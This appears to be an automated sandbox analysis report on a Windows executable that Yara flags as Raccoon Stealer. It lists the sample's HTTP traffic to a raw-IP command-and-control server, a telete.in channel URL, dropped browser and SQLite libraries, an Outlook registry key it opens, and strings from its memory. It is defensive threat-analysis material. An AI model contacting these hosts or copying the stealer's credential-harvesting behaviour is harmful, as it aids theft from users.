Source: global traffic	HTTP traffic detected: GET //l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.228.114.197

Source: unknown

DNS traffic detected: queries for: telete.in

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 94.228.114.197

Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://94.228.114.197
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://94.228.114.197/
Source: KnZsSmDyF3.exe, 00000001.00000003.207802227.0000000000D56000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f
Source: KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f277U
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f=jsonoL
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f2y
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f4
Source: KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://94.228.114.197/2t
Source: KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://94.228.114.197/I_
Source: KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://94.228.114.197/S
Source: KnZsSmDyF3.exe, 00000001.00000003.207812712.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: http://94.228.114.197/dhHq
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: softokn3.dll.1.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3.dll.1.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0Y
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: softokn3.dll.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: softokn3.dll.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: softokn3.dll.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: KnZsSmDyF3.exe, 00000001.00000002.220844808.000000006E199000.00000002.00020000.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: softokn3.dll.1.dr	String found in binary or memory: http://www.mozilla.com0
Source: sqlite3.dll.1.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 1xVPfvJcrg.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 1xVPfvJcrg.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1xVPfvJcrg.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1xVPfvJcrg.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1xVPfvJcrg.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: 1xVPfvJcrg.1.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1xVPfvJcrg.1.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: KnZsSmDyF3.exe, 00000001.00000002.219865851.0000000000DBB000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=pV
Source: KnZsSmDyF3.exe, 00000001.00000003.207846057.0000000000DB0000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207812712.0000000000D63000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207851913.0000000000DBB000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207795100.0000000000DC0000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: KnZsSmDyF3.exe, 00000001.00000002.219865851.0000000000DBB000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: KnZsSmDyF3.exe, 00000001.00000003.207846057.0000000000DB0000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207812712.0000000000D63000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207851913.0000000000DBB000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207795100.0000000000DC0000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000002.219853041.0000000000DB0000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000002.219771194.0000000000D36000.00000004.00000001.sdmp	String found in binary or memory: https://telete.in/jagressor_kz
Source: KnZsSmDyF3.exe, 00000001.00000002.219771194.0000000000D36000.00000004.00000001.sdmp	String found in binary or memory: https://telete.in/jagressor_kzn-
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: https://telete.in/org/img/t_logo.png
Source: KnZsSmDyF3.exe, 00000001.00000002.220797019.000000004C8CD000.00000004.00000001.sdmp	String found in binary or memory: https://wa228.114.197/
Source: softokn3.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: KnZsSmDyF3.exe, 00000001.00000003.217777569.0000000000DC3000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0H
Source: KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0n_
Source: KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0renc
Source: KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
Source: 1xVPfvJcrg.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown

HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.3:49718 version: TLS 1.2

E-Banking Fraud:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 1.2.KnZsSmDyF3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.KnZsSmDyF3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.KnZsSmDyF3.exe.2670e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.KnZsSmDyF3.exe.2770000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.KnZsSmDyF3.exe.2670e50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.KnZsSmDyF3.exe.2770000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.200402548.0000000002770000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.219929790.0000000002670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KnZsSmDyF3.exe PID: 4712, type: MEMORY

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Code function: 1_2_0043C3A8: DeviceIoControl,GetLastError,

1_2_0043C3A8

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_004340F3	1_2_004340F3
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0043454E	1_2_0043454E
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0040C72C	1_2_0040C72C
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0041E7C4	1_2_0041E7C4
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0040CD04	1_2_0040CD04
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0040EE22	1_2_0040EE22
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0043AFE4	1_2_0043AFE4
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_00432F9D	1_2_00432F9D
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0040D407	1_2_0040D407
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0041D425	1_2_0041D425
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_00427858	1_2_00427858
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0042982C	1_2_0042982C
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0040DE52	1_2_0040DE52
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0041DE02	1_2_0041DE02
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_004400D5	1_2_004400D5
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_00448140	1_2_00448140
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0044617A	1_2_0044617A
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_00458139	1_2_00458139
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_00458259	1_2_00458259
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0042837C	1_2_0042837C
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0041C315	1_2_0041C315
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_004623DB	1_2_004623DB
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_004203FE	1_2_004203FE
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_00440390	1_2_00440390
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0043A492	1_2_0043A492
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0041656D	1_2_0041656D
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_00440AC0	1_2_00440AC0
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_00414A8F	1_2_00414A8F
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0045AC8D	1_2_0045AC8D
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_00416E0E	1_2_00416E0E
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0041AE2C	1_2_0041AE2C
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0044AF58	1_2_0044AF58

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: String function: 004656D0 appears 127 times
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: String function: 0044CDB9 appears 33 times
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: String function: 0043DE50 appears 40 times

Source: sqlite3.dll.1.dr

Static PE information: Number of sections : 18 > 10

Source: KnZsSmDyF3.exe	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: KnZsSmDyF3.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: KnZsSmDyF3.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: KnZsSmDyF3.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: KnZsSmDyF3.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: KnZsSmDyF3.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: KnZsSmDyF3.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: api-ms-win-core-string-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found

Source: KnZsSmDyF3.exe, 00000001.00000002.220638860.000000004BA70000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs KnZsSmDyF3.exe
Source: KnZsSmDyF3.exe, 00000001.00000002.221075413.000000006E2FB000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamenss3.dll8 vs KnZsSmDyF3.exe
Source: KnZsSmDyF3.exe, 00000001.00000002.220859964.000000006E1A2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll8 vs KnZsSmDyF3.exe
Source: KnZsSmDyF3.exe, 00000001.00000003.217738997.000000004C8D5000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs KnZsSmDyF3.exe
Source: KnZsSmDyF3.exe, 00000001.00000002.220053335.0000000002750000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs KnZsSmDyF3.exe

Source: KnZsSmDyF3.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: KnZsSmDyF3.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/66@1/2

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Code function: 1_2_00427783 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,

1_2_00427783

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

File created: C:\Users\user\AppData\LocalLow\sqlite3.dll

Jump to behavior

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Mutant created: \Sessions\1\BaseNamedObjects\uiabfqwfuuser

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Command line argument: MF

1_2_00464D40

Source: KnZsSmDyF3.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: softokn3.dll.1.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp, sqlite3.dll.1.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp, sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp, sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp, sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.1.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.1.dr	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp, sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: KnZsSmDyF3.exe	Virustotal: Detection: 62%
Source: KnZsSmDyF3.exe	Metadefender: Detection: 28%
Source: KnZsSmDyF3.exe	ReversingLabs: Detection: 75%

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager

Jump to behavior

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: KnZsSmDyF3.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: KnZsSmDyF3.exe, 00000001.00000002.220844808.000000006E199000.00000002.00020000.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source:	Binary string: .C:\xiyo\pawiyafa kezig\bokinecabigu\xoze\32\bezunu.pdb source: KnZsSmDyF3.exe
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: KnZsSmDyF3.exe, 00000001.00000002.220844808.000000006E199000.00000002.00020000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
